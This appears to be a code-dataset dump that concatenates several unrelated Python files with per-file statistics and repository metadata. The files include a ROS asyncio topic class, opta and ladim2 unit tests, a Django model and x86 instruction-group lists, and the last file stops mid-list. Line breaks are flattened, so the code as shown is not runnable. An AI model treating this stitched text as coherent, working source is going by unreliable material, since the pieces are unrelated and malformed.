from asyncio import AbstractEventLoop from asyncio import iscoroutinefunction from asyncio import Event from asyncio import IncompleteReadError from asyncio import Queue from asyncio import open_connection from asyncio import open_unix_connection from typing import Dict from typing import List from typing import Set from typing import Tuple from typing import Type from genpy import Message from ..api.node_api_client import NodeApiClient from .protocol import Serializer from .protocol import encode_header from .protocol import read_data from .protocol import read_header from .publisher import Publisher from .subscription import Subscription class SubscriberInitError(Exception): pass class Topic: def __init__( self, loop: AbstractEventLoop, node_name: str, topic_name: str, msg_type: Type[Message] ) -> None: self._loop = loop self._node_name = node_name self._topic_name = topic_name self._msg_type = msg_type self._connected_subscribers: Dict[str, Queue] = {} self._connected_publishers: Dict[str, Event] = {} self._has_connected_subscribers: Event = Event() self._has_connected_publishers: Event = Event() self._internal_subscriptions: Set[Subscription] = set() self._internal_publishers: Set[Publisher] = set() self._latched_msgs: Dict[Publisher, bytes] = {} self._serializer: Serializer = Serializer() @property def name(self) -> str: return self._topic_name @property def type(self) -> Type[Message]: return self._msg_type @property def type_name(self) -> str: return self._msg_type._type @property def md5sum(self) -> str: return self._msg_type._md5sum @property def nr_connected_subscribers(self) -> int: return len(self._connected_subscribers) @property def nr_connected_publishers(self) -> int: return len(self._connected_publishers) async def wait_for_connected_subscribers(self) -> None: await self._has_connected_subscribers.wait() async def wait_for_connected_publishers(self) -> None: await self._has_connected_publishers.wait() @property def has_subscriptions(self) -> bool: 
return bool(self._internal_subscriptions) @property def has_publishers(self) -> bool: return bool(self._internal_publishers) @property def is_latching(self) -> bool: return any(pub.latch for pub in self._internal_publishers) def get_publisher_header(self) -> Dict[str, str]: return dict( topic=self.name, type=self.type_name, latching='1' if self.is_latching else '0', message_definition=self.type._full_text, md5sum=self.md5sum, callerid=self._node_name) def register_publisher( self, publisher: Publisher ) -> None: self._internal_publishers.add(publisher) async def unregister_publisher( self, publisher: Publisher ) -> bool: self._latched_msgs.pop(publisher, None) self._internal_publishers.discard(publisher) return self.has_publishers def register_subscription( self, subscription: Subscription ) -> None: self._internal_subscriptions.add(subscription) async def unregister_subscription( self, subscription: Subscription ) -> bool: self._internal_subscriptions.discard(subscription) if not self.has_subscriptions: for event in self._connected_publishers.values(): event.set() return self.has_subscriptions def publish( self, publisher: Publisher, msg: Message ) -> None: if not self._connected_subscribers and not self.is_latching: return with self._serializer.serialize(msg) as serialized_msg: for queue in self._connected_subscribers.values(): queue.put_nowait(serialized_msg) if publisher.latch: self._latched_msgs[publisher] = serialized_msg async def connect_subscriber( self, node_name: str, queue: Queue ) -> None: for publisher in self._internal_publishers: if publisher.on_peer_connect: msg = publisher.on_peer_connect(node_name) if msg: with self._serializer.serialize(msg) as serialized_msg: await queue.put(serialized_msg) serialized_msg = self._latched_msgs.get(publisher) if serialized_msg is not None: await queue.put(serialized_msg) self._connected_subscribers[node_name] = queue self._has_connected_subscribers.set() def disconnect_subscriber( self, node_name: str ) -> None: 
for publisher in self._internal_publishers: if publisher.on_peer_disconnect: publisher.on_peer_disconnect(node_name) del self._connected_subscribers[node_name] if not self._connected_subscribers: self._has_connected_subscribers.clear() def connect_to_publishers( self, publishers: List[str] ) -> None: publishers_set = set(publishers) for publisher_uri in publishers: if publisher_uri in self._connected_publishers: continue self._connected_publishers[publisher_uri] = Event() self._loop.create_task( self._subscribe(publisher_uri)) for publisher_uri in self._connected_publishers: if publisher_uri not in publishers_set: self._connected_publishers[publisher_uri].set() async def _subscribe( self, publisher_uri: str ) -> None: connection_params = await self._get_publisher_connection_params( publisher_uri) try: if connection_params[0] == 'UNIXROS': reader, writer = await open_unix_connection( connection_params[1]) elif connection_params[0] == 'TCPROS': reader, writer = await open_connection( connection_params[1], int(connection_params[2])) header = dict( topic=self.name, message_definition=self.type._full_text, tcp_nodelay='1', md5sum=self.md5sum, type=self.type_name, callerid=self._node_name) writer.write(encode_header(header)) await writer.drain() header_dict = await read_header(reader) if 'error' in header_dict: raise SubscriberInitError(header_dict['error']) self._has_connected_publishers.set() while not self._connected_publishers[publisher_uri].is_set(): msg = self.type() msg.deserialize(await read_data(reader)) for sub in self._internal_subscriptions: if iscoroutinefunction(sub.callback): self._loop.create_task(sub.callback(msg)) else: self._loop.call_soon(sub.callback, msg) except (ConnectionResetError, IncompleteReadError): pass finally: writer.close() if hasattr(writer, 'wait_closed'): await writer.wait_closed() self._connected_publishers.pop(publisher_uri) if not self._connected_publishers: self._has_connected_publishers.clear() async def 
_get_publisher_connection_params( self, publisher_uri: str ) -> Tuple[str, int]: client = NodeApiClient(self._node_name, publisher_uri) topic = await client.request_topic( self.name, [['UNIXROS'], ['TCPROS']]) await client.close() if topic[0] not in ('UNIXROS', 'TCPROS'): raise ValueError('protocol is not supported') return topic
32.40873
75
0.628872
869
8,167
5.628308
0.156502
0.045185
0.047025
0.022081
0.212635
0.116132
0.041709
0.041709
0.023308
0.023308
0
0.002609
0.29607
8,167
251
76
32.537849
0.848148
0
0
0.260465
0
0
0.010775
0
0
0
0
0
0
1
0.074419
false
0.009302
0.093023
0.046512
0.24186
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd325e14189de11da8187eeb203eba8b96feec5
1,911
py
Python
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
595
2021-05-21T22:30:48.000Z
2022-03-31T15:40:25.000Z
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
463
2021-05-24T21:32:59.000Z
2022-03-31T17:12:33.000Z
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
29
2021-05-21T22:27:52.000Z
2022-03-28T16:43:45.000Z
import json import os import unittest from opta.core.local import Local from opta.layer import Layer class LocalTests(unittest.TestCase): def setUp(self) -> None: self.layer = Layer( name="testname", org_name="testorg", providers={"local": {"path": "/tmp"}}, modules_data=[], path="/tmp", parent=None, ) self.local = Local(self.layer) self.local.tf_file = "/tmp/tfconfig" self.local.config_file_path = "/tmp/localconfig" with open(self.local.config_file_path, "w") as f: json.dump( { "opta_version": "dev", "date": "2021-11-15T18:26:47.553097", "original_spec": "", "defaults": {}, }, f, ) with open(self.local.tf_file, "w") as f: f.write("Some tf state for testing") return super().setUp() def tearDown(self) -> None: if os.path.isfile("/tmp/localconfig"): os.remove("/tmp/localconfig") if os.path.isfile("/tmp/tfconfig"): os.remove("/tmp/tfconfig") return super().tearDown() def test_get_remote_config(self) -> None: assert self.local.get_remote_config() == { "opta_version": "dev", "date": "2021-11-15T18:26:47.553097", "original_spec": "", "defaults": {}, } def test_upload_opta_config(self) -> None: self.local.upload_opta_config() dict = json.load(open(self.local.config_file_path, "r")) assert set(dict.keys()) == set( ["opta_version", "original_spec", "date", "defaults"] ) def test_delete_remote_state(self) -> None: self.local.delete_remote_state() assert os.path.isfile(self.local.tf_file) is False
30.333333
65
0.529042
214
1,911
4.574766
0.341122
0.091931
0.036772
0.045965
0.233912
0.175689
0.120531
0.120531
0.120531
0.120531
0
0.031177
0.328624
1,911
62
66
30.822581
0.731878
0
0
0.150943
0
0
0.165358
0.027211
0
0
0
0
0.056604
1
0.09434
false
0
0.09434
0
0.245283
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd3722beee7f3a9735cf08fa0cf57f708146d63
132
py
Python
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
7
2020-06-15T12:25:53.000Z
2021-11-03T01:08:47.000Z
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
null
null
null
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
1
2020-12-21T11:21:22.000Z
2020-12-21T11:21:22.000Z
from environments.maze_env import MazeEnv from environments.ant import AntEnv class AntMazeEnv(MazeEnv): MODEL_CLASS = AntEnv
18.857143
41
0.810606
17
132
6.176471
0.647059
0.304762
0
0
0
0
0
0
0
0
0
0
0.143939
132
6
42
22
0.929204
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
5
bdd3ab9d894a791877cd5b110bbcf4db48bff423
7,943
py
Python
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
import numpy as np # type: ignore import pytest from ladim2.state import State # ------------ # __init__ # ------------ def test_init_minimal(): """Init State with no arguments""" S = State() assert len(S) == 0 assert S.npid == 0 assert set(S.variables) == {"pid", "X", "Y", "Z", "active", "alive"} assert S.instance_variables == {"pid", "X", "Y", "Z", "active", "alive"} assert S.particle_variables == set() assert S.pid.dtype == int assert all(S.pid == []) assert S.X.dtype == np.float64 assert all(S.variables["X"] == []) assert all(S["X"] == []) assert all(S.X == []) assert S.Y.dtype == float assert S.Z.dtype == "f8" assert S.alive.dtype == bool assert S.default_values["alive"] def test_init_args(): """Init State with extra variables""" S = State( instance_variables=dict(age=float, stage=int), particle_variables=dict(release_time="time"), default_values=dict(age=0, stage=1), ) assert "age" in S.instance_variables assert S.age.dtype == float assert S.default_values["age"] == 0 assert S.stage.dtype == int assert S.particle_variables == {"release_time"} assert S.release_time.dtype == np.dtype("M8[s]") assert S.dtypes["release_time"] == np.dtype("M8[s]") assert all(S.release_time == np.array([], np.datetime64)) def test_override_mandatory(): S = State(instance_variables=dict(X="f4")) assert S.X.dtype == np.float32 def test_set_default_err1(): """Trying to set default for an undefined variable""" with pytest.raises(ValueError): State(particle_variables={"age": float}, default_values=dict(length=4.3)) def test_set_default_err2(): """Trying to set default for pid""" with pytest.raises(ValueError): S = State(default_values=dict(pid=42)) def test_set_default_err3(): """Trying to set an array as default value""" with pytest.raises(TypeError): S = State( instance_variables=dict(length=float), default_values=dict(length=[1.2, 4.3]), ) # -------------------- # append # -------------------- def test_append_scalar(): state = State() state.append(X=200, Z=5, Y=100) assert len(state) 
== 1 assert state.npid == 1 assert np.all(state.pid == [0]) assert np.all(state.active == [True]) assert np.all(state.alive == [True]) assert np.all(state.X == [200]) def test_append_array(): """Append an array to a non-empty state""" state = State() state.append(X=200, Z=5, Y=100) length = len(state) npid = state.npid state.append(X=np.array([201, 202]), Y=110, Z=[5, 10]) assert len(state) == length + 2 assert state.npid == npid + 2 assert np.all(state.pid == [0, 1, 2]) assert np.all(state["pid"] == [0, 1, 2]) assert np.all(state.variables["pid"] == [0, 1, 2]) assert np.all(state.active == 3 * [True]) assert np.all(state.alive == 3 * [True]) assert np.all(state.X == [200, 201.0, 202.0]) assert np.all(state["X"] == [200, 201.0, 202.0]) assert np.all(state.variables["X"] == [200, 201.0, 202.0]) assert np.all(state.Y == [100.0, 110.0, 110.0]) assert np.all(state.Z == [5.0, 5.0, 10.0]) def test_extra_instance_variables(): """Append with extra instance variables, with and without default""" state = State( instance_variables=dict(age=float, stage="int"), default_values=dict(stage=1) ) assert len(state) == 0 assert state.age.dtype == float assert state.stage.dtype == int state.append(X=[1, 2], Y=2, Z=3, age=0) assert len(state) == 2 assert all(state.age == [0, 0]) assert all(state.stage == [1, 1]) def test_append_nonvariable(): """Append an undefined variable""" state = State() with pytest.raises(ValueError): state.append(X=1, Y=2, Z=3, length=20) def test_append_missing_variable(): state = State() # with pytest.raises(TypeError): # Now Y becomes NaN, correct behaviour?? 
state.append(X=100, Z=10) assert state.Y[0] != state.Y[0] def test_append_missing_particle_variable(): state = State(particle_variables=dict(X_start=float)) # with pytest.raises(TypeError): state.append(X=100, Y=200, Z=5) assert state.X_start[0] != state.X_start[0] def test_append_shape_mismatch(): state = State() with pytest.raises(ValueError): state.append(X=[100, 101], Y=[200, 201, 202], Z=5) def test_missing_default(): state = State( instance_variables=dict(age=float, stage=int), default_values=dict(age=0) ) # No default for stage # with pytest.raises(TypeError): # state.append(X=1, Y=2, Z=3) # changed behaviour: now check for NaN state.append(X=1, Y=2, Z=3) assert state.stage[0] != state.stage[0] def test_not_append_pid(): """Can not append to pid""" S = State() with pytest.raises(ValueError): S.append(X=10, Y=20, Z=5, pid=101) # ---------------- # Update # ---------------- def test_variable_update(): """Update a variable, low level""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) S.variables["X"] += 1 assert all(S.variables["X"] == [101, 111]) def test_update_item(): """Item style variable update is OK""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) S["X"] += 1 assert all(S.variables["X"] == [101, 111]) def test_update_attr(): """Attribute style assignment to variables is not allowed""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(AttributeError): S.X += 1 def test_update_error_not_variable(): S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(KeyError): S["Lon"] = [4.5, 4.6] def test_update_error_wrong_size(): # Alternative broadcast the scalar, equivalent to s["X"] = [110, 100] S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(KeyError): S["X"] = 110 with pytest.raises(KeyError): S["X"] = [101, 111, 121] # -------------- # Compactify # -------------- def test_compactify(): S = State(default_values=dict(Z=5)) S.append(X=[10, 11], Y=[1, 2]) assert len(S) == 2 
S.append(X=[21, 22], Y=[3, 4]) assert len(S) == 4 # Kill second particle S.alive[1] = False S.compactify() assert len(S) == 3 assert S.npid == 4 assert np.all(S.active) assert np.all(S.alive) assert np.all(S.pid == [0, 2, 3]) assert np.all(S.X == [10, 21, 22]) # The arrays should be contiguous after removing an element assert S.X.flags["C_CONTIGUOUS"] def test_not_compactify_particle_variables(): S = State(particle_variables=dict(X0=float), default_values=dict(Z=5)) X0 = [10, 11, 12, 13] Y0 = [20, 21, 22, 23] S.append(X=X0, Y=Y0, X0=X0) S.alive[1] = False S.compactify() assert len(S) == 3 assert all(S.pid == [0, 2, 3]) assert all(S.X == [10, 12, 13]) # particle_variable X0 is not compactified assert all(S.X0 == X0) def test_update_and_append_and_compactify(): """Check that updating bug has been fixed""" S = State() # One particle S.append(X=100, Y=10, Z=5) assert all(S.pid == [0]) assert all(S.X == [100]) # Update position S["X"] += 1 assert all(S.pid == [0]) assert all(S.X == [101]) # Update first particle and add two new particles S["X"] += 1 S.append(X=np.array([200, 300]), Y=np.array([20, 30]), Z=5) assert all(S.pid == [0, 1, 2]) assert all(S.X == [102, 200, 300]) # Update particle positions and kill the first particle, pid=0 S["X"] = S["X"] + 1.0 S["alive"][0] = False S.compactify() assert all(S.pid == [1, 2]) assert all(S.X == [201, 301]) # Update positions S["X"] = S["X"] + 1 assert all(S.pid == [1, 2]) assert all(S.X == [202, 302])
27.675958
85
0.590583
1,216
7,943
3.775493
0.14227
0.02091
0.043563
0.048791
0.418427
0.312786
0.272925
0.241124
0.218689
0.172511
0
0.067487
0.222082
7,943
286
86
27.772727
0.675514
0.154727
0
0.258065
0
0
0.020393
0
0
0
0
0
0.408602
1
0.123656
false
0
0.016129
0
0.139785
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
bdd4db2e43df9f7b67e7a41de13b7d8d81ab3b7c
220
py
Python
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class Friend(models.Model): name = models.CharField(max_length=60) email = models.CharField(max_length=60) def __str__(self): return self.name
24.444444
43
0.713636
31
220
4.870968
0.677419
0.198676
0.238411
0.317881
0.344371
0
0
0
0
0
0
0.022472
0.190909
220
8
44
27.5
0.825843
0.109091
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0.166667
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
5
bdd62727280cef056fc775786f12ebffe8812748
28,253
py
Python
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
from tiknib.feature.asm_ppc import PPC_GRP_MAP # ==================== x86 32 ============================================= # data transfer X86_GRP_DTRANSFER = [ # general purpose instructions "CMOV", "CMOVA", "CMOVAE", "CMOVB", "CMOVBE", "CMOVC", "CMOVE", "CMOVG", "CMOVGE", "CMOVL", "CMOVLE", "CMOVNA", "CMOVNAE", "CMOVNB", "CMOVNBE", "CMOVNC", "CMOVNE", "CMOVNG", "CMOVNGE", "CMOVNL", "CMOVNLE", "CMOVNO", "CMOVNP", "CMOVNS", "CMOVNZ", "CMOVO", "CMOVP", "CMOVPE", "CMOVPO", "CMOVS", "CMOVZ", "BSWAP", "XCHG", "XADD", "CMPXCHG", "CMPXCHG8B", "POP", "POPA", "POPAD", "PUSH", "PUSHA", "PUSHAD", "CDQ", "CDQE", "CBW", "CWD", "CWDE", "MOV", "MOVD", "MOVQ", "MOVABS", "MOVSX", "MOVSXD", "MOVZX", "MOVZXD", # string "MOVS", "MOVSB", "MOVSD", "MOVSW", "STOS", "STOSB", "STOSD", "STOSW", "LODS", "LODSB", "LODSD", "LODSW", # segment register "LDS", "LES", "LFS", "LGS", "LSS", # user mode extended "XSAVE", "XSAVEC", "XSAVEOPT", "XRSTOR", "XGETBV", "XSETBV", # BMI1, BMI2 "BEXTR", "BLSI", "PDEP", "PEXT", # MMX "PACKSSDW", "PACKSSWB", "PACKUSDW", "PACKUSWB", "PUNPCKHBW", "PUNPCKHDQ", "PUNPCKHWD", "PUNPCKLBW", "PUNPCKLDQ", "PUNPCKLWD", "EMMS", # SSE 64-bit integer "PMOVMSKB", "PSHUFW", # SSE2 128-bit integer "MOVDQA", "MOVDQU", "MOVQ2DQ", "MOVDQ2Q", "PSHUFLW", "PSHUFHW", "PSHUFD", "PUNPCKLQDQ", "PUNPCKHQDQ", # SSSE2 "PSHUFB", "PALIGNR", # SSE4 "MOVNTDQA", "PBLENDVB", "PBLENDW", "PINSRB", "PINSRD", "PINSRQ", "PEXTRB", "PEXTRW", "PEXTRD", "PEXTRQ", "PMOVSXBW", "PMOVZXBW", "PMOVSXBD", "PMOVZXBD", "PMOVSXWD", "PMOVZXWD", "PMOVSXBQ", "PMOVZXBQ", "PMOVSXWQ", "PMOVZXWQ", "PMOVSXDQ", "PMOVZXDQ", "PACKUSDW", "LGDT", "SGDT", "LLDT", "SLDT", "LTR", "STR", "LIDT", "SIDT", "MOV", "LMSW", "SMSW", "CLTS", "LSL", "LAR", "VERR", "VERW", # 64-bit "CDQE", "CQO", ] X86_GRP_FLOAT_DTRANSFER = [ # floating point instrutions "FLD", "FST", "FSTP", "FILD", "FIST", "FISTP", "FBLD", "FBSTP", "FXCH", "FCMOVB", "FCMOVBE", "FCMOVE", "FCMOVNB", "FCMOVNBE", "FCMOVNE", "FCMOVNU", "FCMOVU", # floating point load const 
instructions "FLD1", "FLDZ", "FLDPI", "FLDL2E", "FLDLN2", "FLDL2T", "FLDLG2", # FPU register related "FCLEX", "FFREE", "FINIT", "FLDCW", "FLDENV", "FNCLEX", "FNINIT", "FNOP", "FNSAVE", "FNSTCW", "FNSTENV", "FNSTSW", "FRSTOR", "FSAVE", "FSTCW", "FSTENV", "FSTSW", # SSE "MOVAPS", "MOVUPS", "MOVHPS", "MOVHLPS", "MOVLPS", "MOVLHPS", "MOVMSKPS", "MOVSS", # SSE2 "MOVAPD", "MOVUPD", "MOVHPD", "MOVHLPD", "MOVLPD", "MOVLHPD", "MOVMSKPD", "MOVSD", # SSE Shuffle "SHUFPS", "UNPCKHPS", "UNPCKLPS", # SSE2 shuffle "SHUFPD", "UNPCKHPD", "UNPCKLPD", # SSE Conversion "CVTPI2PS", "CVTSI2SS", "CVTPS2PI", "CVTTPS2PI", "CVTSS2SI", "CVTTSS2SI", # SSE2 Conversion "CVTPD2PI", "CVTTPD2PI", "CVTPI2PD", "CVTPD2DQ", "CVTTPD2DQ", "CVTDQ2PD", "CVTPS2PD", "CVTPD2PS", "CVTSS2SD", "CVTSD2SS", "CVTSD2SI", "CVTTSD2SI", "CVTSI2SD", "CVTDQ2PS", "CVTPS2DQ", "CVTTPS2DQ", # SSE MXCSR State "LDMXCSR", "STMXCSR", # SSE 64-bit "PEXTRW", "PINSRW", # SSE cache "MASKMOVQ", "MOVNTQ", "MOVNTPS", "PREFETCH", "SFENCE", # SSE3 "FISTTP", "LDDQU", "MOVSHDUP", "MOVSLDUP", "MOVDDUP", # SSE4 "BLENDPD", "BLENDPS", "BLENDVPD", "BLENDVPS", "EXTRACTPS", "INSERTPS", # 16-bit FP "VCVTPS2PH", "VCVTPS2PH", # Vector "VALIGN", "VBLEND", "VCOMPRESS", "VEXTRACT", "VINSERT", "VMOV", "VFIXUP", "VGET", "VEXPAND", "VCVT", "VPBLEND", "VPBROAD", "VPCOMPRESS", "VPERM" "VPEXPAND" "VPMOV", "VPSCATTER", "VSCATTER", "VSHUF", ] # - Miscellaneous Instructions: X86_GRP_MISC = [ "NOP", "UD", "UD2", "LEA", "XLAT", "XLATB", "CPUID", "MOVBE", "PREFETCHW", "PREFETCHWT1", "CLFLUSH", "CLFLUSHOPT", # SSE2 cache "CLFLUSH", "LFENCE", "MFENCE", "MASKMOVDQU", "MOVNTPD", "MOVNTDQ", "MOVNTI", ] X86_GRP_ARITH = [ # general purpose binary arithmetic instructions "ADCX", "ADOX", "ADC", "ADD", "XADD", "SUB", "SBB", "IMUL", "MUL", "IDIV", "DIV", "INC", "DEC", "NEG", "CMP", # decimal arithmetic instructions "DAA", "DAS", "AAA", "AAS", "AAM", "AAD", # flag "STC", "CLC", "CMC", "CLD", "STD", # BMI1, BMI2 "MULX", # MMX "PADD", "PADDB", "PADDW", "PADDD", "PADDSB", 
"PADDSW", "PADDUSB", "PADDUSW", "PSUB", "PSUBB", "PSUBW", "PSUBD", "PSUBSB", "PSUBSW", "PSUBUSB", "PSUBUSW", "PMULHW", "PMULLW", "PMADDWD", # SSE 64bit integer "PAVGB", "PAVGW", "PMAXUB", "PMAXSB", "PMINUB", "PMINSB", "PMULHUW", "PSADBW", # SSE 128-bit integer "PMULUDQ", "PADDQ", "PSUBQ", # SSSE3 "PHADDW", "PHADDSW", "PHADDD", "PHSUBW", "PHSUBSW", "PHSUBD", "PABSB", "PABSW", "PABSD", "PABSQ", "PMADDUBSW", "PMULHRSW", "PSIGNB", "PSIGNW", "PSIGND", # SSE4 "PMULLD", "PMULDQ", "PMINUW", "PMINUD", "PMINSB", "PMINSD", "PMAXUW", "PMAXUD", "PMAXSB", "PMAXSD", "ROUNDPS", "ROUNDPD", "ROUNDSS", "ROUNDSD", "PMPSADBW", # AESNI "AESDEC", "AESDECLAST", "AESENC", "AESENCLAST", "AESIMC", "AESKEYGENASSIST", "PCLMULQDQ", # SHA1 "SHA1MSG1", "SHA1MSG2", "SHA1NEXTE", "SHA1RNDS4", "SHA256MSG1", "SHA256MSG2", "SHA256RNDS2", "CRC32", # BMI1, BMI2 "BLSMSK", "BLSR", "CLAC", "STAC", ] X86_GRP_FLOAT_CMP = [ # floating point compare instructions "FCOM", "FCOMP", "FCOMPP", "FUCOM", "FUCOMP", "FUCOMPP", "FICOM", "FICOMP", "FCOMI", "FUCOMI", "FCOMIP", "FUCOMIP", "FTST", "FXAM", # SSE "CMPPS", "CMPEQPS", "CMPNEQPS", "CMPLTPS", "CMPNLTPS", "CMPSS", "CMPEQSS", "CMPNEQSS", "CMPLTSS", "CMPNLTSS", "COMISS", "UCOMISS", "CMPPD", "CMPEQPD", "CMPNEQPD", "CMPLTPD", "CMPNLTPD", "CMPSD", "CMPEQSD", "CMPNEQSD", "CMPLTSD", "CMPNLTSD", "COMISD", "UCOMISD", # vector "VPCMP", ] X86_GRP_FLOAT_ARITH = [ # - floating point instructions: "FADD", "FADDP", "FIADD", "FSUB", "FSUBP", "FISUB", "FSUBR", "FSUBRP", "FISUBR", "FMUL", "FMULP", "FIMUL", "FDIV", "FDIVP", "FIDIV", "FDIVR", "FDIVRP", "FIDIVR", "FPREM", "FPREM1", "FABS", "FCHS", "FRNDINT", "FSCALE", "FSQRT", "FXTRACT", # floating point transcendental instructions "FSIN", "FCOS", "FSINCOS", "FPTAN", "FPATAN", "F2XM1", "FYL2X", "FYL2XP1", # fpu register related "FINCSTP", "FDECSTP", # SSE "ADDPS", "ADDSS", "SUBPS", "SUBSS", "MULPS", "MULSS", "DIVPS", "DIVSS", "RCPPS", "RCPSS", "SQRTPS", "SQRTSS", "RSQRTPS", "RSQRTSS", "MAXPS", "MAXSS", "MINPS", "MINSS", # SSE2 "ADDSD", 
"SUBSD", "MULSD", "DIVSD", "RCPSD", "SQRTSD", "RSQRTSD", "MAXSD", "MINSD", # SSE3 "ADDSUBPS", "ADDSUBPD", "HADDPS", "HSUBPS", "HADDPD", "HSUBPD", # SSE4 "DPPD", "DPPS", # vector "VPMAX", "VPMIN", "VRCP", "VRNDSCAL", "VRSQRT", "VSCALE", "ADDPD", "ADDSD", "MULPD", "MULSD", "SUBPD", "SUBSD", "DIVPD", "DIVSD", "RCPPD", "RCPSD", ] X86_GRP_CMP = [ "CMP", "COMI", "CLT", # from dtransfer "CMPXCHG", "CMPXCHG8B", # from bit "TEST", # from string "CMPS", "CMPSB", "CMPSD", "CMPSW", # MMX "PCMPEQB", "PCMPEQW", "PCMPEQD", "PCMPGTB", "PCMPGTW", "PCMPGTD", # SSE4 "PHMINPOSUW", "PTEST", "PCMPEQQ", # SSE4.2 "PCMPESTRI", "PCMPESTRM", "PCMPISTRI", "PCMPISTRM", "PCMPGTQ", # Vector "VPTEST", ] # Shift and Rotate Instructions: X86_GRP_SHIFT = [ # general purpose instructions "SAR", "SHR", "SAL", "SHL", "SHRD", "SHLD", "ROR", "ROL", "RCR", "RCL", # BMI1, BMI2 "RORX", "SARX", "SHLX", "SHRX", # MMX "PSLLW", "PSLLD", "PSLLQ", "PSRLW", "PSRLD", "PSRLQ", "PSRAW", "PSRAD", # SSE2 128-bit integer "PSLLDQ", "PSRLDQ", # vector "VPROL", "VPROR", "VPSRA", "VPSLL", "VPSRA", ] # Logical Instructions: X86_GRP_LOGIC = [ # general purpose instructions "AND", "NOT", "OR", "XOR", # BMI1, BMI2 "ANDN", # MMX "PAND", "PANDN", "POR", "PXOR", # SSE "ANDPS", "ANDNPS", "ORPS", "XORPS", # SSE2 "ANDPD", "ANDNPD", "ORPD", "XORPD", # Vector "VPTERLOG", ] # bit and byte instructions: X86_GRP_BIT = [ # general purpose instructions "SETA", "SETAE", "SETB", "SETBE", "SETC", "SETE", "SETG", "SETGE", "SETL", "SETLE", "SETNA", "SETNAE", "SETNB", "SETNBE", "SETNC", "SETNE", "SETNG", "SETNGE", "SETNL", "SETNLE", "SETNO", "SETNP", "SETNS", "SETNZ", "SETO", "SETP", "SETPE", "SETPO", "SETS", "SETZ", "TEST", "CRC32", # BMI1, BMI2 "BLSMSK", "BLSR", "CLAC", "STAC", # from bit "TEST", "BT", "BTS", "BTR", "BTC", "BSF", "BSR", "POPCNT", "TZCNT", "LZCNT", ] # control transfer instructions: X86_GRP_CTRANSFER = [ # general purpose instructions "JMP", "CALL", "RET", "IRET", "INT", "INTO", "BOUND", "ENTER", "LEAVE", # flag "CLI", "STI", # 
